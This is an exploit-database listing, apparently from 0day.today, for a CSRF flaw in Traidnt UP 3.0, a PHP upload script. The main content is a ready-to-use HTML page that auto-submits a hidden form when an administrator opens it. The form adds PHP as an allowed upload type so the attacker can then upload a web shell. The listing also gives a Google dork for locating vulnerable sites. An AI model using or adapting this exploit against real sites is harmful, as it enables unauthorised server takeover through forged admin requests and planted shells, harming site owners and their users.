[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Traidnt UP CSRF upload shell Vulnerability

Author
G-B
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19152
Category
web applications
Date add
08-08-2012
Platform
php
#----------------------------------------------------------------------
# Exploit Title: Traidnt UP <- CSRF ADD Extension Then Upload php File
# Google Dork: "Powered By Traidnt Up"
# Date: 08/08/2012
# Exploit Author: G-B
# Software Link: https://code.google.com/p/traidntup/
# Version: V 3.0
#-----------------------------------------------------------------------
# After Adding PHP extension Go To the Home page And Upload Your shell
# Your shell will be here : http://TARGET/truploads/php/
#-----------------------------------------------------------------------

<html>
<body onload="document.getElementById('send').submit()">
<form id="send" method="post" action="http://TARGET/admin/ext.php?do=addnew">
<input name="name" type="hidden" value="php" />
<input name="type" type="hidden" value="5" />
<input name="maxuploadsize" type="hidden" value="999999" />
<input name="maxuploadpathsize" type="hidden" value="9999999" />
</form>
</body>
</html>



#  0day.today [2024-11-16]  #